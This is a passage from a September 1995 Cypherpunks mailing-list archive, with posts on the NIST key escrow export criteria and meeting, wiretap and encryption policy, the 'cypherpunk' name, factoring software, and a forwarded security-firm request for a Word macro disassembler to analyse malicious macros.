these multiple sub-directories and counts the number of relations found. There is also a program to predict (fairly accurately!) how close to done you are based on output from the counting program. This code will also include a decent collection of fast, very portable multiple precision routines. All this is for the taking if you guarantee to factor just one number for me. - -- Bob Silverman The MathWorks Inc. 24 Prime Park Way Natick, MA -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMFd5fsLa+QKZS485AQELHAL/QS2LizHGSzT7h3b8cU78GiR9QLoaQ6zf FEEyt8XRDFqlUe7CKFfDKB1SPPviAZeBPM4XDfswfvfXpKNLamZQUNc7VYgzPIC0 3knFeQf2A/zWuGBZQp/TM0xBcwKW5lW7 =Zyke -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From scmayo at rschp2.anu.edu.au Wed Sep 13 17:46:21 1995 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Wed, 13 Sep 95 17:46:21 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <9509140046.AA07859@toad.com> P. Trei writes > "CYPHERPUNK" considered harmful > I would like to propose that we, the 'cypherpunks', are making a > strategic error, which will make it far more difficult to achieve the > goal we share. > Our error lies in our approach to encouraging the widespread use of > crypto. It is an error of hubris - overweening pride. > We too often think of ourselves as an elite - smarter and better in > various ways to our non-cpunk neighbours. We refer to these others as > 'Joe Sixpack" and other such derogatary terms. I think thsi is confusing two separate things. The need to publicise and encourage the use of crypto is important to many of us and lots of us do this in various ways (web pages, magazine articles etc). The other aspect of the cypherpunks is writing code, discussing protocols etc, some of which is fairly arcane stuff and is by necessity the interest of an "elite" (as you put it). I think the success of this list lies in the mixture. > I suggest that we drop the term 'cypherpunk' - it has the wrong > connotations to get our ideas into the mainstream. I don't have a > perfect replacement yet: I'll come clean and say that initially the term "cypherpunks" made me cringe (and still does, maybe 'cos I'm a brit ;-) ;-) but I certainly remembered it and it stuck in my mind enough to get me interested in this stuff in the first place. In short, don't ditch the name because if nothing else it *is* memorable, much more so that some more comventional tag. However, you do make some bloody good points about not alienating more conservative people by coming over all crypto-anarchist (or whatever your particular bent is) when encouraging/publicising the use of crypto. The "why use crypto" questions and answers was a good example of how to appeal to a more conservative viewpoint. When trying to find out about crypto intially on the WWW I was rather overwhelmed by the number of political rants and a bit underwhelmed by the lack of solid info. This situation has improved a lot in the last 2 years but still needs work IMHO. [An aside to Web page maintainers... Another thing to consider (for Web sites in particular) is that people from _all over the world_ will be reading it. If your site is a fairly central one, bear in mind that a lot of rants about congress trampling all over the Nth amendment mean bugger all to a lot of us furriners, and come over as a bit parochial. I'm not saying a local perspective is a bad thing, just that it shouldn't be the only thing. ] my 2c worth Sherry From ponder at wane-leon-mail.scri.fsu.edu Wed Sep 13 18:15:04 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Wed, 13 Sep 95 18:15:04 PDT Subject: MS-Word macros disassembler/cracker? Message-ID: This was on the Info-Sec mailing list and appears to be a request for help in cracking some sort of execute-only wrappers on MicroSoft Word-for-Windows macros, the concern being that the macros need to be defused if they're malignant. If anybody wants to, they may respond right to: njb at csehost.knoware.nl . . . . . >All the macros are made ExecuteOnly, meaning that they are compiled or >encrypted so that the Word macro interpretor can execute them, but they >cannot be listed or edited. Does anyone reading this list happen to know >where we can find a cracker or disassembler for ExecuteOnly Word macros? It >is of vital importance that we are able to read malignant Word macros, and >any help will be appreciated. . . . . >macro vira to us at the email address below. And I repeat: We are very >interested in obtaining a cracker for the Word macro language >encryptor/compiler. We haven't looked at this yet. For all we know it could >be very simple, but any info is appreciated. > >Niels > >-- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- >-- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 -- >-- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 -- >-- Netherlands Email: njb at csehost.knoware.nl -- >-- PGP Public key available on request - please use when mailing vira -- From warlord at MIT.EDU Wed Sep 13 18:20:40 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 13 Sep 95 18:20:40 PDT Subject: Factoring Software (fwd) In-Reply-To: <199509140039.SAA00376@wero.byu.edu> Message-ID: <199509140120.VAA05979@toxicwaste.media.mit.edu> > Just saw this on Usenet, was wondering who knows this guy. Obviously not > a cpunk or it would have hit the list right away. Not in the mood to run > code on my account without knowing that I know what it will do. Gee, Bob moved -- I wonder how long he's been at MathWorks... Anyways, Bob Silverman is a known Factoring Guy (TM). He's been involved in network factoring for a long time. The software he is distributing, MPQS, is the algorithm that was used to factor rsa-129. Although this is probably not the same implementation that we used then, it probably is pretty much the same. I've met Bob; he is not a tentacle. ;-) -derek From tcmay at got.net Wed Sep 13 18:20:58 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 13 Sep 95 18:20:58 PDT Subject: "Who knows this guy?" Message-ID: At 12:39 AM 9/14/95, don at cs.byu.edu wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >Just saw this on Usenet, was wondering who knows this guy. Obviously not >a cpunk or it would have hit the list right away. Not in the mood to run >code on my account without knowing that I know what it will do. > > >From: bobs at mathworks.com (Bob Silverman) >Newsgroups: >sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithme >tic It's funny, this thing about names and reputations. You see, I know the name "Bob Silverman," and his company, Mathworks, a whole lot more than I know the name "don at cs.byu.edu". Mathworks was heavily in the news last fall during the Pentium debacle (including someone I used to know from Intel, Cleve Moler). I've only seen the posts of "don at cs.byu.edu" since 8-29-95, just the last two weeks. (I don't claim to have a complete archive, as I delete a lot of stuff. But this is the earliest don at cs.byu.edu post I can find.) Certainly I am not impugning the reputation of don at cs.byu.edu, just noting the irony of him asking for if anyone knows who Bob Silverman is. Strange days. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mnorton at cavern.uark.edu Wed Sep 13 18:55:35 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 13 Sep 95 18:55:35 PDT Subject: Key Escrow as Law Enforcement's *Worst Nightmare* In-Reply-To: Message-ID: Darn. I always thought it came from "The Monkey's Paw." MacN On Tue, 12 Sep 1995, Timothy C. May wrote: > > "Be careful what you ask for--you might get it." (Albanian Proverb) > From stewarts at ix.netcom.com Wed Sep 13 18:59:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Sep 95 18:59:19 PDT Subject: An opportunity not to be missed Message-ID: <199509140159.SAA16728@ix3.ix.netcom.com> >On Wed, 13 Sep 1995, David C. Lambert wrote: > >> I propose that we get some likely candidate (actually, a similar candidate >> to the one above) to advocate the benefits of anonymity on the net. Is Wavy Gravy running his "Nobody for President" campaign again this time? After all, Nobody's going to balance the budget, and Nobody's going to get the government out of your bedroom, and on the internet, Nobody can tell if you're a dog or not :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 13 18:59:30 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Sep 95 18:59:30 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <199509140159.SAA16796@ix3.ix.netcom.com> This whole flap reminds me of the days it was discovered that the FBI was buying Usenet access, on tape monthly rather than online. >(Phill Hallam Baker's request that we respect the privacy of >Government employees started this thread) Yup. It would be nice to know what our employees are doing with all this fancy equipment we've bought them, but on the other hand, I'd far rather have them seeing the abuse the net gives them in person rather than having to have the FBI or some other filtering bureaucracy explain to them what the net all about ... #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 13 19:00:28 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Sep 95 19:00:28 PDT Subject: GAK/weak crypto rationale? Message-ID: <199509140159.SAA16862@ix3.ix.netcom.com> At 11:46 PM 9/12/95 -0400, Brian Davis wrote: >> > I don't doubt that wiretaps may sometimes be abused despite the >> > incredibly onerous review process, but they have positive aspects, too. >> >> In how many of these cases did you fail to get the necessary information >> because of encryption? Has this proportion been changing over the years? > >I wasn't personally involved in any of the cases, but I suspect the >answer re encryption is zero. There was the time the FBI agent failed to >push the record button, however. >My response was to the wiretap correlation to career-making cases. >I don't believe encryption is widespread enough yet to be a serious problem >in the Title III area. It is a potential problem, though, as encryption >(rightfully) spreads. You're probably right. On the other hand, especially as dealers in politically incorrect substances get better privacy technology, this will become much more of an issue, and I get the impression from what I read in the papers that big drug busts, arrests of major organized crime figures, and the rare terrorist cases are probably big career wins for the police agents and prosecutors involved. >The question I am debating with myself, with all >of your help, is what the policy "ought to be." As you might guess, I think the government makes lots of laws about things that are not their business, and wiretaps and other privacy invasions are especially useful for prosecuting victimless crimes and dissident political groups, since none of the participants call the cops. On the other hand, I've had friends whose businesses have been burned down by the Mafia, and don't like murderers bombing pubs, either, and stopping people like that is legitimate police business. However, I think the moral case is very clear that people have the right to communicate freely and privately, and to use whatever technology or languages they want to to attempt to do so; any government that would try to prevent that is more of a threat to freedom than a benefit. And police have had a lot of success with informants, and new technology has really improved equipment for bugging suspects- if you folks do your jobs honestly and apologize when you make mistakes about invading incorrect suspects' privacy, go ahead and use it. The really gray areas are things like widespread coordinated surveillance of public activities - cameras in the subways, etc. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From gnu at toad.com Wed Sep 13 19:19:19 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 13 Sep 95 19:19:19 PDT Subject: Ron Plesser's take on NIST GAK meeting Message-ID: <9509140219.AA09487@toad.com> I converted a document in some proprietary Windows binary format to ASCII. Formatting mistakes are mine. Ron Plesser is a very experienced lobbyist. He was involved in the passage of the ECPA, among other things. He's CIX's lawyer, and sent this document to CIX (the Commercial Internet Exchange), which passed it on to its membership. John Gilmore PIPER & MARBURY L.L.P. Memorandum To: Interested Parties From: Ron Plesser Date: September 11, 1995 Subject: NIST Key Escrow Encryption Meeting The National Institute of Standards and Technology on September 6 and 7 held a meeting on issues regarding key escrow encryption, focusing on export criteria for software and desirable characteristics for U.S. key escrow agents. Ten draft software key escrow export criteria were put forth by NIST for consideration and possible revision (see below). Key escrow encryption is the recent Administration proposal for an alternative to Clipper Chip, which industry opposed. Key escrow would, in the Administration's view, allow the export of software with strong encryption. In summary, the government would permit the general licensing of 64-bit-key encryption provided that it be manufactured with a key that would be maintained by independent escrow agents who were certified by the U.S. government. Foreign escrow agents could be used where there was a bi-lateral agreement with the particular country involved. NIST Deputy Director Ray Kammer provided an overview of the goals of the meeting, and said that NIST plans to issue a Federal Register notice containing a "revised set of thoughts" in three weeks. There will be a 60-day comment period following publication of the revised principles in the Federal Register. The NIST will then review the comments received and determine whether there is enough consensus to proceed. There will be additional meetings on September 15, 1995 to discuss the Federal government's requirements for its own information processing standards for key escrow encryption. This meeting will take place at the Gaithersburg, Maryland Hilton Hotel from 9:00 a.m. to 5:00 p.m. It was clear from the meeting, both in presentations and conversation during breaks, that most computer systems and certainly those used by large entities will have key escrow systems for encryption. There was even a person who spoke who said that they are doing this now. Many people at the meeting acknowledged that key escrow would be implemented at some point for domestic as well as for exported programs. The issue is who would hold the key. For example, could a company hold its own keys or could an independent agent be used? The people who create mass market software, however, still expressed significant opposition to key escrow. While the government went to some length to express that this solution is neutral as to software or hardware, it has to be acknowledged that hardware-based systems are easier to control. The subject that was not well discussed was encryption in relation to network services and the internet. It was discussed in relation to the issues of interoperability and the ability to decrypt both sides of a communication. The assumption that I and others had at the outset was that the Administration had made progress in the last year in raising itself from the ashes of Clipper Chip. By the end of the meeting that was not altogether clear. There will remain a great deal of controversy surrounding this issue. Congress is sure to get involved and it will get messier before it gets resolved. Administration Comments Mike Nelson, who is special assistant for information technology to the White House Office of Science and Technology Policy and co-chair of the inter-agency working group on encryption, provided a historical overview of the data encryption issue. He said that the proposed 64-bit-key encryption is 17 million times stronger than the 40-bit-key encryption currently allowed to be exported. Under the proposed policy, software with 64-bit-key encryption could be exported to friendly countries under certain conditions, all of which require that a key to that encryption be available in the U.S. from an independent third-party. Mr. Nelson stated that the new policy will open up new market opportunities for the U.S. computer software industry, and that key escrow has the potential to become a de facto global standard. The Administration policy for 40-bit-key encryption will continue as-is, and no keys will have to be escrowed for such systems. Mr. Nelson said that the government's main concern is that strong encr In response to questioning, Mr. Nelson stated that the 64-bit-key limit is being imposed because the government is not certain that the key escrow system will work. Once the system is up and running, longer keys may be allowable. He said that the draft criteria are based on national security needs, and that they were pushed as far as possible to meet commercial needs. Mr. Nelson added that the Administration is discussing the possibility of federal legislation with Hill staff to avoid varying state laws on encryption. Industry Perspectives General reaction was mixed to the government's proposal. Most heavy industrial and commercial users of encryption seemed accepting of the Administration's position. To them this meant greater flexibility and would mean that most larger systems could get export licenses for 64-bit-key systems and this would expand the capacity to sell larger systems abroad. This position was exemplified by Trusted Information Systems (TIS), representatives of which spoke several times. In a presentation, Peter Dinsmore of TIS offered restatements of the criteria to make them more commercially viable, and a set of "criteria for the criteria," which are as follows: 1) don't specify commercial criteria, 2) don't exceed the minimum, 3) don't allow criteria creep, 4) don't solve the dual-rogue problem, 5) don't over protect, and 6) use generic nomenclature. He recommended that criteria six and nine be removed altogether, a view that was echoed by other participants. The mass market software industry and the public interest groups were very opposed to the Administration proposal. They do not believe that 64-bit key is sufficient, and they do not believe that anyone will buy U.S.-manufactured software with a key that is to be held by a third party under at least some control by the government. There was a fair amount of confusion on the issue at the meeting, but it now seems clear that the government would permit foreign escrow where there are bi-lateral agreements with friendly nations. In a presentation, Bob Holleyman of the Business Software Alliance criticized the Administration's failure to "liberalize export controls on generally available software employing non-key escrow encryption." Also, he stated that the Administration's proposal and the draft criteria "continue to reflect a misunderstanding of the market place and, if implemented in anything like their current form, will prevent key escrow encryption from ever being commercially adopted." Mr. Holleyman r In addition, the representative of MCI strongly objected to the proposal as an incursion into the private sector and as an impediment to the development of a strong information infrastructure. Encryption guru Whit Diffie of Sun Micro Systems and others objected to the proposal. Danny Weitzner of the Center for Democracy and Technology said that CDT was going to go to Congress and object to the implementation of this proposal. They thought that it was a bad deal and the government should not be placed in the position of directing standards and requiring back doors into encryption systems. Discussion of Criteria Six, Seven and Eight Following the industry presentations, participants divided into groups to discuss various criteria. The group that discussed criteria six, seven and eight made the following observations and recommendations. There seemed to be universal objection to criterion six. This would limit the interoperability of systems. It effectively states that exported 64-bit key cannot be used to decrypt messages that were encrypted with a higher value. This would make it very difficult for U.S. companies to interact with foreign subsidiaries. The internet would find great difficulty in connection with this criteria. Regarding criterion seven, concern was raised that in the context of e-mail, it would be onerous to do key escrow for every transmission. Concern also was raised about maintaining the integrity of intellectual property in instances in which the escrow agent is in a foreign country. In effect, when one chooses an escrow center, one also is selecting a legal system. A request was made for a supplemental document explaining applicable existing laws. Concern was raised that all of the criteria are focused on the voice communication paradigm, rather than on the dynamic data communications environment. Laws also are focused on this paradigm, and law moves slowly whereas computer technology moves rapidly. In addition, the criteria do not address varying international laws on issues such as privacy. Companies will have to comply with the laws of the strictest countries. Concern was raised that privacy considerations are not as apparent in the criteria as ease of access by law enforcement agencies. Also, innocent parties could be de-escrowed. In addition, it was emphasized that encryption must not interfere with use of existing software. Information was requested on two encryption schemes, Banker's Trust and Fortress. It was recommended that the TIS restatement of criterion seven be adopted. This restatement is as follows: "The key escrow mechanism allows access to both sides of a simultaneous (i.e., two-way) communication with only access to the decrypting information from one of the users." It also was recommended that for bi-directional communications, both parties negotiate a common key and escrow it, and that for one way communications, the sender select the escrow key. Regarding criterion eight, it was agreed that the technology issues, international issues, and privacy issues are the same as those for criterion seven. It was noted that certain implementations would require escrowing of the session key, which is unrealistic. It was agreed that with one court order, law enforcement agencies should have the ability to decrypt a stream of messages. However, there must be a time limit on decryption. It was agreed that agents should be able to implement an automated system. General Review/Comments on All Criteria Industry and government representatives met less formally with the objective of reviewing each of the criteria and attempting to reconcile differences. However, this did not occur; instead, broader issues were discussed. There was a certain amount of tension during this session, as each side complained that the other did not understand its needs. Industry members said that it seemed that implementation of the draft criteria, or a version thereof, is a foregone conclusion on the part of government, without industry input concerning the entire concept. Specifically, industry members challenged the 64-bit maximum as being arbitrary and unnecessary. They said that although 56-bit encryption was discussed with government last year, technology moves rapidly, and now 64 bits are not enough. A NIST representative countered that the National Security Agency is "putting a big card on the table" with 64 bits. Industry members also protested that the criteria do not meet the needs of the global marketplace. Consumers will not buy products designed to meet these criteria because they already have access to 64-bit encryption with no keys either free or at a low cost. They argued that the scope of the criteria (e.g., criterion nine) is broader than the stated objective of exportability, and requested more information as to why each criterion is being proposed. Concern also was raised that foreign countries with bi-lateral agreements with the U.S. will act against U.S. key escrow agents. Also, industry will not know the terms of these agreements. Export Procedures Officials of Department of State and the Department of Commerce explained in general terms how this program would work. Each application would go first to the State Department for a jurisdictional certification on technical aspects. If State were satisfied that the criteria had been met, then it would certify the application over to the Commerce Department for general licensing procedures. There would also be an escrow package, that would have to be certified. It was not clear who would control the certification of escrow agents. Escrow Agents The issue of who could be an escrow agent and how they would be controlled was discussed, but not resolved. The issues of liability for wrongful release, the conditions of release, and related questions were not resolved. It seemed clear to me that escrow agents would have to be independent of the user entity. If this law firm were to use an encryption package in its London office, the key would have to be placed with a third party. Conclusion While no issues were resolved at the meeting, it provided a valauble forum for the exchange of ideas between government and industry. Focus now turns to Congress, and to the crafting of a constructive response to the upcoming Federal Register notice. The Administration seems open to changes. The mass market software industry and the public interest community seem negative. We will continue to keep you informed. --- Draft Export Criteria --- for Software Key Escrow Encryption Software key escrow encryption products meeting the following criteria will be granted special export licensing treatment similar to that afforded other mass-market software products with encryption. 1. The product will use an unclassified encryption algorithm (e.g., DES, RC4) with a key length not to exceed 64 bits. 2. The product shall be designed to prevent multiple encryption (e.g., triple-DES). 3. The key required to decrypt each message or file shall be accessible through a key escrow mechanism in the product, and such keys will be escrowed during manufacture in accordance with #10. If such keys are not escrowed during manufacture, the product shall be inoperable until the key is escrowed in accordance with #10. 4. The key escrow mechanism shall be designed to include with each encrypted message or file, in a format accessible by authorized entities, the identity of the key escrow agent(s), and information sufficient for the escrow agent(s) to identify the key or key components required to decrypt that message. 5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block). 6. The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled. 7. The key escrow mechanism allows access to a user's encrypted information regardless of whether that user is the sender or the intended recipient of the encrypted information. 8. The key escrow mechanism shall not require repeated involvement by the escrow agents for the recovery of multiple decryption keys during the period of authorized access. 9. In the event any such product is or may be available in the United States, each production copy of the software shall either have a unique key required for decrypting messages or files that is escrowed in accordance with #10, or have the capability for its escrow mechanism to be rekeyed and any new key to be escrowed in accordance with #10. 10. The product shall accept escrow of its key(s) only with escrow agents certified by the U.S. Government or by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements. Note: Software products incorporating additional encryption methods other than key escrow encryption methods will be evaluated for export on the basis of each encryption method included, as is already the case with existing products. Accordingly, these criteria apply only to the key escrow encryption method incorporated by a software product, and not to other non-escrowed encryption methods it may incorporate. For instance, non-escrowed encryption using a key length of 40 bits or less will continue to be exportable under existing export regulations. - Please also review discussion paper #1 (distributed earlier), which raises a number of issues involving exportability criteria and how exportable products could be designed. Discussion paper #2 (also previously distributed) presents questions involving key escrow agents. ~WASH01A:49767:1:|09/11/95 1-10 From pfarrell at netcom.com Wed Sep 13 19:22:33 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 13 Sep 95 19:22:33 PDT Subject: Can GAK be made "not interoperable" with PGP? Message-ID: <80481.pfarrell@netcom.com> Duncan Frissell writes: > Timothy C. May wrote: >>But is this even possible, to make a GAK system "not interoperable" with, >> say, PGP? >> Unless the GAK system has some sort of entropy analyzer, and can >> recognize high-entropy sources which it presumes to be encrypted data >> (*), one can of course PGP-encrypt a text file and then GAK the >> resulting file. > > I took it to mean that they were saying that an approved program on one > end of a communication exchange could not exchange encrypted messages or > established an encrypted session of some kind with an un approved program > on the other end. Not trying to outlaw superencryption (PGP on both ends > using a GAKed channel) but GAK on one end working with an unapproved > system on the other end. A ringer GAK-work-alike that would defeat the > intent of GAK. > I don't know if the government can prevent that with a software-only > system or indeed if half a secure system can be made completely secure. The breakout session that I was in was directly charged with this issue. We talked at length about it. There were NIS&T and NSA folks at the session. The consensus was that the Government wanted to prevent a version of PGP that was export enabled (GAK and short keys) that would be backward compatible. The group stated strongly that this was a "non starter." That is, it was unacceptable. Vendors wanted "sales appeal." That means compatibility with existing software. And compatibility with existing export-approved systems. [DES has been exported to "friendly" countries with strict controls.] And criteria #2 specifically outlawed superencryption. No DES | TRAN | DES | TRAN | DES. They were serious. talk to CME, he was in that session. I believe that this criteria is stupid, or at least ill-advised. But the govies insisted. All the more justification to ignore the US rules and develop off-shore. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From tcmay at got.net Wed Sep 13 19:26:27 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 13 Sep 95 19:26:27 PDT Subject: An opportunity not to be missed Message-ID: At 1:57 AM 9/14/95, Bill Stewart wrote: >Is Wavy Gravy running his "Nobody for President" campaign again this time? >After all, Nobody's going to balance the budget, and Nobody's going to >get the government out of your bedroom, and on the internet, Nobody can tell >if you're a dog or not :-) Or to update it for today: "Nobody at remailer.org for President." --Tim ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mnorton at cavern.uark.edu Wed Sep 13 19:31:38 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 13 Sep 95 19:31:38 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <199509131926.PAA14458@panix.com> Message-ID: I don't know about national characteristics. After all, "What's in a name? Would a rose by any other name..." and so on. Cypherpunk fits. Cypherpunk suits. So, if the suit fits... MacN On Wed, 13 Sep 1995, Duncan Frissell wrote: > At 10:57 AM 9/13/95 -0700, Timothy C. May wrote: > > >While I have had some qualms about the name, on balance I think it has been > >good for us. After all, it's not as if _other_ groups don't already exist! > >In particular, the British branch of Cypherpunks disliked the name > >"Cypherpunks" so much that they used a different name for themselves, the > >"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for > >whatever reasons. But the name may have been a factor, at least. > > Note too that Brits differ from Americans. "Wired" worked well here from > the beginning but has had problems there. Differing national characteristics. > > DCF > > "Let's all just agree to disagree. My system can thrive with widespread > disagreement among rabid individualists --- can yours?" > > From mnorton at cavern.uark.edu Wed Sep 13 20:05:59 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 13 Sep 95 20:05:59 PDT Subject: Digital Fingerprinting In-Reply-To: <9509131457.AA17323@cantina.verity.com> Message-ID: On Wed, 13 Sep 1995, Patrick Horgan wrote: > > > > > Then, in W.Ky., as in Stockbridge, "You can get > > > anything you want..."? :) > > > > I'd stick with: > > *********************************************** > > You can't always get what you want 1 > > but if you try > > sometimes, sometimes you get what you need. 2 > > *********************************************** > > > > 1 ability to dump garbage where you want > > 2 a better appreciation for the environment > > :-) > > > Why do I feel like I'm sitting on the group W bench? I don't know, kid, what you in for? MacN From bdavis at thepoint.net Wed Sep 13 20:52:48 1995 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 13 Sep 95 20:52:48 PDT Subject: CAGK rationale (was: Re: GAK/weak crypto rationale?) In-Reply-To: <9509132212.AA28200@tis.com> Message-ID: On Wed, 13 Sep 1995 cme at acm.org wrote: > >Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT) > >From: Brian Davis > > > In our district, we > >managed to convict almost 20 people in an investigation of the state > >legislature, including the now-former Speaker of the House and > 6 other > >legislators. Bribing lobbyists took hits, etc. > > > >Particularly effective were the court-approved video and audio tapes of > >the Speaker taking a bribe in exchange for certain action on legislation > >and responding to the bribing party: "Well bless your heart." > >That has become the office's mantra. > > Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with > all gov't officials forced to use keys held by various newspapers and > other watchdog agencies.... > > The video and audio bugs aren't part of the wiretap process so they don't > apply here. > You need to reread Title III. The same law applies. And when encryption defeats all wiretaps, there will likely be more "interceptions of oral communications." That is, bugs. And that's something I hadn't thought of until just now. EBD > - Carl > > +--------------------------------------------------------------------------+ > |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | > |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | > | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | > +----------------------------------------------------------- Jean Ellison -+ > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From shamrock at netcom.com Wed Sep 13 21:10:20 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 13 Sep 95 21:10:20 PDT Subject: [Meeting at Tim's house participant] Who wanted the AT&T UNIX for 8086/80286 ? Message-ID: <199509140407.AAA12906@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Would the person who expressed interest in my collection of genuine AT&T UNIX for the AT&T 6300 (an 8086) and 6300 Plus (an 80286) complete with several shelf feet hard cover doccumentation as well as the developer kit please get in touch with me? As for the rest of you: you may stop laughing now ;-) - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFeqlyoZzwIn1bdtAQEkswF/dxu8jYNFjLVRK+3SbNy9ee2fc4xzsro6 elH7VHUX85Y/23EQmL0wBoVkAyqHKk0Z =uYSW -----END PGP SIGNATURE----- From goedel at tezcat.com Wed Sep 13 21:16:44 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Wed, 13 Sep 95 21:16:44 PDT Subject: Need ideas. NFP to monitor law enforcement on the net. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Dear cpunks, after reading several articles about government sting operations in the US and Bavaria, I'm thinking of starting a not for profit to collect and diseminate information on law enforcement on the net. I know how to register a NFP Corp, and certainly know about mailing lists and web pages, but other problems still remain to be solved. Specifically: 1) Is it better to be a national or state registered NFP? (Given the level of LEA hassling I might experience.) 2) What if I start a mailing list and nobody shows up? Whose participation should I ensure so that the effort is a success. 3) What are some good sources of information for LEA's on the net? Any suggestions would be most welcome. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMFe6MnIf3YegbdiBAQHmeAJYz4bKtqPJvcdyUxcuVEOVgAYNO3sRuUzW lnYnq7o2qBMcePAW8xTVECmwt8DXTbutSTJC10DBHdyjDGdgdwwN3ne0mCWN7Pig uDUk =W0pp -----END PGP SIGNATURE----- Dietrich J. Kappe | Red Planet http://www.redweb.com/ Red Planet, L.L.C.| "Chess Space" /chess 1-800-RED 0 WEB | "MS Access Products" /cobre Web Publishing | PGP Public Key /goedel/key.txt From nobody at REPLAY.COM Wed Sep 13 21:25:54 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 13 Sep 95 21:25:54 PDT Subject: NSA on GAK Message-ID: <199509140420.GAA10736@utopia.hacktic.nl> The opening comments here by Admiral McConnell of the NSA appear to parallel the comments of Mr. Michael Nelson at the September 6 NIST Key Escrow meeting on the use of encryption by "spies, terrorists, and criminals." URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt ---------- Note: The following answers were provided by NSA to the Senate Subcommittee on Technology and the Law in response to their follow- up questions to the May 3, 1994 hearings. --------------------------- Senate Subcommittee on Technology and the Law Hearing on the Administration's Key Escrow Encryption Standard Written Questions for Vice Admiral McConnell, NSA *Questions for Senator Pressler: Q: Admiral, as you are aware, critics of the Administration's proposal argue that as a practical matter, no criminal, foreign spy, or terrorist of any sophisticated would be foolish enough to use an encryption device designed by the NSA and approved by the FBI. How do you respond? Why do[n't you] think the people whose telecommunications the NSA and the FBI want most to decode will be the very people most unlikely to use this technology? Answer: From what we know today, the overriding requirement that spies, terrorist, and criminals have is for readily available and easy to use equipment that interoperates. Key escrow encryption is not meant to be a tool to catch criminals. It will make excellent encryption available to legitimate businesses and private citizens without allowing criminals to use the telecommunications system to plan and commit crimes with impunity. We believe it would be irresponsible for government to make excellent encryption broadly available knowing that its use by criminals would make it impossible for law enforcement agencies to conduct lawful wiretaps against them. The Department of Justice credits information gleaned through wiretaps as leading to more than 20,000 felony convictions since the early 1980s. This would not have been possible if the criminals had been using encryption systems the FBI could not break. Without government action, however, this fortunate situation will change. At present most people, and most criminals, don't use encryption. However, there is an increasing public awareness of the value of encryption for protecting private personal and business communications. Increasing demand for encryption by the public will likely lead to the widespread use of some form of standardized encryption on the public telecommunications network. This development would have great benefits for the country. Legitimate businesses an private individuals could use the telecommunications system secure in the knowledge that their private information such as business records and credit card numbers could not be intercepted by third parties. But there is a down side. Criminals, terrorists, and others could also use the system to plan crimes, launder money, and the like, completely secure in the knowledge 